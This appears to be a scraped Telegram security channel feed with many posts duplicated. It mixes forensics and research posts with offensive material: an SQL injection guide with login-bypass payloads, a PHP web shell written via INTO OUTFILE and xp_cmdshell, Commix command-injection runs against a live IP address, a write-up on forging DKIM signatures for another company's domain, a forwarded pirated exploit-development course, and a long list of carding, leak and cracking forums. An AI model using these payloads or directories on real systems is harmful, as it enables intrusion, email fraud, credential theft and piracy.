Forensics: Обзор инструментария и тренировочных площадок
#forensics
Форензика (компьютерная криминалистика, расследование киберпреступлений) — прикладная наука о раскрытии преступлений, связанных с компьютерной информацией, об исследовании цифровых доказательств, методах поиска, получения и закрепления таких доказательств. В этой статье мы рассмотрим популярные инструменты для проведения криминалистического анализа и сбора цифровых доказательств.
#forensics
How We Cracked a 512-Bit DKIM Key for Less Than $8 in the Cloud
Пошаговый гайд по тому, как на основе слабых (
В статье получили контроль над
Пошаговый гайд по тому, как на основе слабых (
<1024 бит) публичных ключей DKIM восстановить приватные (спойлер: дешево и быстро). Как восстановил — можно начать рассылать письма, как будто ты легитимный владелец чужого домена.В статье получили контроль над
redfin.com и заслали письма нескольким провайдерам, — Yahoo, Mailfence и Tuta приняли подпись.GitHub
GitHub - RandomRobbieBF/nuclei-drupal-sa: Nuclei templates for drupal vulns... far from perfect
Nuclei templates for drupal vulns... far from perfect - RandomRobbieBF/nuclei-drupal-sa
Nuclei templates for #drupal vulnerabilities
Github: Link
How to use Nuclei templates?
#CyberSecurity #bugbounty #Nuclei #infosec
Github: Link
How to use Nuclei templates?
nuclei -t ./nuclei-drupal-sa/templates/ --target https://www.example.com
#CyberSecurity #bugbounty #Nuclei #infosec
#OffSec | EXP-301: Windows User
Mode Exploit Development
OSED Certification
Windows User Mode Exploit Development (EXP-301) is a course that teaches learners the basics of modern exploit development. Despite being a fundamental course, it is at the 300 level because it relies on substantial knowledge of assembly and low level programming. It begins with basic buffer overflow attacks and builds into learning the skills needed to crack the critical security mitigations protecting enterprises.
Mode Exploit Development
OSED Certification
Windows User Mode Exploit Development (EXP-301) is a course that teaches learners the basics of modern exploit development. Despite being a fundamental course, it is at the 300 level because it relies on substantial knowledge of assembly and low level programming. It begins with basic buffer overflow attacks and builds into learning the skills needed to crack the critical security mitigations protecting enterprises.
Forwarded from @GlobalRedHat
EXP301 OSED Exploit Development - EXP301 Videos PDF.zip
2.2 GB
- OSED - EXP-301. Videos + PDF
/dump/
resym-ccs24.pdf
🐙 resym
"ReSym: Harnessing LLMs to Recover Variable and Data Structure Symbols from Stripped Binaries" by Danning Xie, Zhuo Zhang, Nan Jiang, Xiangzhe Xu, Lin Tan, and Xiangyu Zhang.
"ReSym: Harnessing LLMs to Recover Variable and Data Structure Symbols from Stripped Binaries" by Danning Xie, Zhuo Zhang, Nan Jiang, Xiangzhe Xu, Lin Tan, and Xiangyu Zhang.
Commix v4.0-stable
UPD. Большой апдейт до major ветки 4.0
Комбайн для эксплуатации Command Injection уязвимостей, написан на python Команды, ключи, вывод и все остальное очень похоже на SQLMap.
В Kali предустановлен.
Установка:
"Детский" режим:
Обычный запуск:
Поддержка тамперов:
Список тамперов:
Download
Usage examples
#commix #python #pentest #soft
UPD. Большой апдейт до major ветки 4.0
Комбайн для эксплуатации Command Injection уязвимостей, написан на python Команды, ключи, вывод и все остальное очень похоже на SQLMap.
В Kali предустановлен.
Установка:
git clone https://github.com/commixproject/commix.git commix
python commix.py -h
"Детский" режим:
python commix --wizard
Обычный запуск:
python commix -u http://62.173.140.174:16016/ --data 'action='
Поддержка тамперов:
python commix -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs
Список тамперов:
python commix --list-tampersDownload
Usage examples
#commix #python #pentest #soft
Creando tu propio C2 con Python (Ingles) 📡🐍
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-1/
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-2/
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-3/
#articulo #c2 #python #dev
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-1/
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-2/
https://g3tsyst3m.github.io/c2/python/Create-your-own-C2-using-Python-Part-3/
#articulo #c2 #python #dev
G3tSyst3m's Infosec Blog
Create your own C2 using Python- Part 1
Back in the good ole days of my adolescence, I was fascinated with all things Metasploit. I was a ripe old teenager when Metasploit first came out, and I was enamored by it’s inginuity and multifaceted offerings. You could simply use it to get a shell,…
🤣1
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
━━━━━━━━━━━━━━━━
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
🔹Method 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
━━━━━━━━━━━━━━━━
🔹Method 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
━━━━━━━━━━━━━━━━━
🔹 Method 3: Using SQLMap for Automated Testing
🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
━━━━━━━━━━━━━━━━━
🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
━━━━━━━━━━━━━━━━━
🔹Method 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
━━━━━━━━━━━━━━━
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
🔹Example: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
🔹If SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
━━━━━━━━━━━━━━━
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
💡 Conclusion
•Test manually using ' and OR 1=1
•Use SQLMap for automatic SQLi detection
•Escalate SQLi to RCE if the system allows file operations
•Test SQL Sleep (Time-Based Injection) for hidden errors
•Use UNION SELECT to extract sensitive data
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
HACKING FORUMS -some may not work-.
0x00sec – https://0x00sec.org
Alligator – https://alligator.cash
Altenen Forums – https://altenens.is
Antichat – https://forum.antichat.com
ASCarding – https://ascarding.com
Black Hat Pro Tools – https://www.blackhatprotools.info
BreachForums – https://breachforums.st
Carder Forum Online – https://carder-forum.online
Carding Forum – https://cardingforum.cx
Carding Leaks – https://cardingleaks.ws
CardVilla – https://cardvilla.cc
Chitachok – https://chitachok.fun
Combolist – https://combolist.top
Cracked – https://cracked.io
Crackia – https://crackia.com
Cracking – https://cracking.org
Crackingall – https://crackingall.com
Cracking Hits – https://crackinghits.to
Cracking Italy – https://crackingitaly.to
Cracking X – https://crackingx.com
Cracking Pro – https://www.crackingpro.com
Crackingshare – https://crackingshare.com
Crackx – https://crackx.to
Crimenetwork – https://crime.to
CrdCrew – https://crdcrew.cc
CrdPro – https://crdpro.cc
CWEB Carding Forum – https://www.cweb.ws
CyberForum RU – https://www.cyberforum.ru
Cyber Leaks – https://cyberleaks.to
Cyber Nulled – https://cybernulled.com
DarkPro – https://darkpro.net
DarkStash – https://darkstash.com
Dark-Time – https://srv2.dark-time.life
Darkweb Mafias – https://darkwebmafias.ws
Demon Forums – https://www.demonforums.net
DirectLeaks – https://directleaks.to
DrDark – https://drdark.ru
ELeaks – https://eleaks.to
Enclave – https://www.enclave.cc
Eternia – https://eternia.to
Exetools – https://forum.exetools.com
Exploit.in – https://exploit.in
EzCarder – https://ezcarder.cc
ForumTeamSite – https://forumteam.site
FSSquad – https://fssquad.com
Ghostlyhaks – https://ghostlyhaks.com/forum
Go4Expert – https://www.go4expert.com/forums
Greekhacking – https://greekhacking.gr
Hack Forums – https://hackforums.net
Hacking Father – https://hackingfather.com
Hackonology – https://hackonology.com/forum
Hack Seller – https://hackseller.com
HacksTurkey – https://hacksturkey.com
Happy Hack – http://happy-hack.net/board
Hide01 Forums – https://forums.hide01.ir
High-Minded – https://high-minded.net
Indetectables – https://indetectables.net/index.php
Iran-Cyber – https://iran-cyber.net/forums
Kuketz Forum – https://forum.kuketz-blog.de
Leak Forum – https://leakforum.org
Leak Zone – https://leakzone.net
Leaked BB – https://leakedbb.com
Leech – https://leech.is
Legit Carder – https://legitcarder.ru
LegitCarders – https://legitcarders.ws
Lolz Guru – https://lolz.guru
MaulTalk – https://www.maultalk.com
Memory Hackers – https://memoryhackers.org
Niflheim – https://niflheim.top
Noirth – https://noirth.com
Nsane Forums – https://nsaneforums.com
Null Cracker – https://nullcrack.store
Nulled – https://www.nulled.to
Nulled.Id – https://nulled.id
Pegasus Hack Team – https://pegasushackteam.com
Psylab – https://psylab.cc
Openssource – https://www.openssource.info
P0wersurge – https://p0wersurge.com/forums
ProLogic – https://prologic.su
R10 – https://www.r10.net
Reteam – http://reteam.org/board
ROM Hacking – https://www.romhacking.net/forum
RST Forums – https://rstforums.com/forum
Russian Carder – https://russiancarder.net
Seopirat – https://www.seopirat.club
Shield Forum – https://shieldforum.in
Sinful Site – https://sinfulsite.com
Sinisterly – https://sinister.ly
SoldierX – https://www.soldierx.com/bbs
SzeneBox – https://www.szenebox.org
TrainingCircle – https://trainingcircle.in
Trusted Sellers – https://trustedsellers.ws
TurkHacks – https://www.turkhacks.com
Underc0de – https://underc0de.org/foro
UnderWorldMafias – https://underworldmafias.net
Valid Market – https://www.validmarket.io
Verified Carder – https://www.verifiedcarder.net
VLMI – https://vlmi.ws
Webmasters – http://webmasters.ru/forum
Wilders Security – https://www.wilderssecurity.com
Xaker.Name Team – https://xak.guru
XSS.is – https://xss.is
YouHack – https://www.youhack.ru
0x00sec – https://0x00sec.org
Alligator – https://alligator.cash
Altenen Forums – https://altenens.is
Antichat – https://forum.antichat.com
ASCarding – https://ascarding.com
Black Hat Pro Tools – https://www.blackhatprotools.info
BreachForums – https://breachforums.st
Carder Forum Online – https://carder-forum.online
Carding Forum – https://cardingforum.cx
Carding Leaks – https://cardingleaks.ws
CardVilla – https://cardvilla.cc
Chitachok – https://chitachok.fun
Combolist – https://combolist.top
Cracked – https://cracked.io
Crackia – https://crackia.com
Cracking – https://cracking.org
Crackingall – https://crackingall.com
Cracking Hits – https://crackinghits.to
Cracking Italy – https://crackingitaly.to
Cracking X – https://crackingx.com
Cracking Pro – https://www.crackingpro.com
Crackingshare – https://crackingshare.com
Crackx – https://crackx.to
Crimenetwork – https://crime.to
CrdCrew – https://crdcrew.cc
CrdPro – https://crdpro.cc
CWEB Carding Forum – https://www.cweb.ws
CyberForum RU – https://www.cyberforum.ru
Cyber Leaks – https://cyberleaks.to
Cyber Nulled – https://cybernulled.com
DarkPro – https://darkpro.net
DarkStash – https://darkstash.com
Dark-Time – https://srv2.dark-time.life
Darkweb Mafias – https://darkwebmafias.ws
Demon Forums – https://www.demonforums.net
DirectLeaks – https://directleaks.to
DrDark – https://drdark.ru
ELeaks – https://eleaks.to
Enclave – https://www.enclave.cc
Eternia – https://eternia.to
Exetools – https://forum.exetools.com
Exploit.in – https://exploit.in
EzCarder – https://ezcarder.cc
ForumTeamSite – https://forumteam.site
FSSquad – https://fssquad.com
Ghostlyhaks – https://ghostlyhaks.com/forum
Go4Expert – https://www.go4expert.com/forums
Greekhacking – https://greekhacking.gr
Hack Forums – https://hackforums.net
Hacking Father – https://hackingfather.com
Hackonology – https://hackonology.com/forum
Hack Seller – https://hackseller.com
HacksTurkey – https://hacksturkey.com
Happy Hack – http://happy-hack.net/board
Hide01 Forums – https://forums.hide01.ir
High-Minded – https://high-minded.net
Indetectables – https://indetectables.net/index.php
Iran-Cyber – https://iran-cyber.net/forums
Kuketz Forum – https://forum.kuketz-blog.de
Leak Forum – https://leakforum.org
Leak Zone – https://leakzone.net
Leaked BB – https://leakedbb.com
Leech – https://leech.is
Legit Carder – https://legitcarder.ru
LegitCarders – https://legitcarders.ws
Lolz Guru – https://lolz.guru
MaulTalk – https://www.maultalk.com
Memory Hackers – https://memoryhackers.org
Niflheim – https://niflheim.top
Noirth – https://noirth.com
Nsane Forums – https://nsaneforums.com
Null Cracker – https://nullcrack.store
Nulled – https://www.nulled.to
Nulled.Id – https://nulled.id
Pegasus Hack Team – https://pegasushackteam.com
Psylab – https://psylab.cc
Openssource – https://www.openssource.info
P0wersurge – https://p0wersurge.com/forums
ProLogic – https://prologic.su
R10 – https://www.r10.net
Reteam – http://reteam.org/board
ROM Hacking – https://www.romhacking.net/forum
RST Forums – https://rstforums.com/forum
Russian Carder – https://russiancarder.net
Seopirat – https://www.seopirat.club
Shield Forum – https://shieldforum.in
Sinful Site – https://sinfulsite.com
Sinisterly – https://sinister.ly
SoldierX – https://www.soldierx.com/bbs
SzeneBox – https://www.szenebox.org
TrainingCircle – https://trainingcircle.in
Trusted Sellers – https://trustedsellers.ws
TurkHacks – https://www.turkhacks.com
Underc0de – https://underc0de.org/foro
UnderWorldMafias – https://underworldmafias.net
Valid Market – https://www.validmarket.io
Verified Carder – https://www.verifiedcarder.net
VLMI – https://vlmi.ws
Webmasters – http://webmasters.ru/forum
Wilders Security – https://www.wilderssecurity.com
Xaker.Name Team – https://xak.guru
XSS.is – https://xss.is
YouHack – https://www.youhack.ru
Forwarded from Kaon (NGC6537)
ANSSI and FBI hack into C2 server to remove PlugX malware
A French law enforcement agency has gained access to the C2 server assigned IP address 45.142.166.112. [...] Working with the French law enforcement agency, the FBI can send the self-delete command to the TARGET DEVICES infected with this variant of PlugX malware. [...] The requested warrant was previously issued on August 28, 2024 and has been reissued on a rolling basis since then. The FBI has counted the daily number of TARGET DEVICES that communicated with the C2 server and were sent the command to self-delete the PlugX malware. As of December 17, 2024, the self-delete command has been sent to thousands of unique IP addresses, with a consistent rate of disinfection.
For 5 months, FBI has been using Mustang Panda's C2 server that was hacked by a "French law enforcement agency" (ANSSI) to remove malware from American computer using commands sent via said C2 server.
Link: https://www.justice.gov/opa/pr/justice-department-and-fbi-conduct-international-operation-delete-malware-used-china-backed
A French law enforcement agency has gained access to the C2 server assigned IP address 45.142.166.112. [...] Working with the French law enforcement agency, the FBI can send the self-delete command to the TARGET DEVICES infected with this variant of PlugX malware. [...] The requested warrant was previously issued on August 28, 2024 and has been reissued on a rolling basis since then. The FBI has counted the daily number of TARGET DEVICES that communicated with the C2 server and were sent the command to self-delete the PlugX malware. As of December 17, 2024, the self-delete command has been sent to thousands of unique IP addresses, with a consistent rate of disinfection.
For 5 months, FBI has been using Mustang Panda's C2 server that was hacked by a "French law enforcement agency" (ANSSI) to remove malware from American computer using commands sent via said C2 server.
Link: https://www.justice.gov/opa/pr/justice-department-and-fbi-conduct-international-operation-delete-malware-used-china-backed
👍1
Media is too big
VIEW IN TELEGRAM
🔥 Learn Ethical Hacking Full Course in 10 Hours [Beginners to Advanced] 🔥